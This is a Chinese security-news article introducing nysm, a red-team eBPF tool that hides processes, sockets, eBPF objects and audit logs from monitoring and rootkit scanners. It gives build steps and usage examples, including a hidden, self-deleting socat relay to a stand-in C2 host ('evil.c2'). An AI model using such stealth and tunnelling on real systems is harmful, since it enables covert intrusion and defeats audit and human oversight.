nysm:一款针对红队审计的隐蔽型后渗透安全测试容器
Alpha_h4ck
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
收藏一下~
可以收录到专辑噢~
nysm:一款针对红队审计的隐蔽型后渗透安全测试容器

关于nysm
nysm是一款针对红队审计的隐蔽型后渗透安全测试容器,该工具主要针对的是eBPF,能够帮助广大红队研究人员在后渗透测试场景下保持eBPF的隐蔽性。
功能特性
随着基于eBPF的安全工具越来越受社区欢迎,nysm也应运而生。该工具能保持各种安全测试工具的隐蔽性,当前版本的nysm支持隐藏下列内容:
1、新的eBPF程序;
2、新的eBPF Map;
3、新的eBPF链接;
4、新的审计生成日志;
5、新的进程PID;
6、新的会话套接字;
除了隐藏eBPF之外,当前版本的nysm还支持隐藏下列工具组件:
bpftool
bpflist-bpfcc
ps
top
sockstat
rkhunter
chkrootkit
lsof
auditd
...
工具安装
源码获取:
广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/eeriedusk/nysm.git
工具依赖组件安装:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y
Linux Header配置:
cd ./nysm/src/ bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
代码构建:
cd ./nysm/src/ make
工具使用
nysm的使用非常简单,并提供了下列参数命令:
Usage: nysm [OPTION...] COMMAND Stealth eBPF container. -d, --detach 在后台运行命令 -r, --rm 执行后执行自毁程序 -v, --verbose 生成Verbose模式输出 -h, --help 显示工具帮助信息 --usage 显示工具使用提示消息
工具使用样例
运行一个隐藏的Bash:
./nysm bash
运行一个隐藏的ssh并移除./nysm:
./nysm -r ssh user@domain
以守护进程形式运行一个隐藏的socat并移除./nysm:
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
许可证协议
本项目的开发与发布遵循Apache-2.0开源许可证协议。
项目地址
nysm:【GitHub传送门】
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Alpha_h4ck 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
Tetragon:一款基于eBPF的运行时环境安全监控工具
2025-01-21
DroneXtract:一款针对无人机的网络安全数字取证工具
2025-01-21
CNAPPgoat:一款针对云环境的安全实践靶场
2025-01-21
文章目录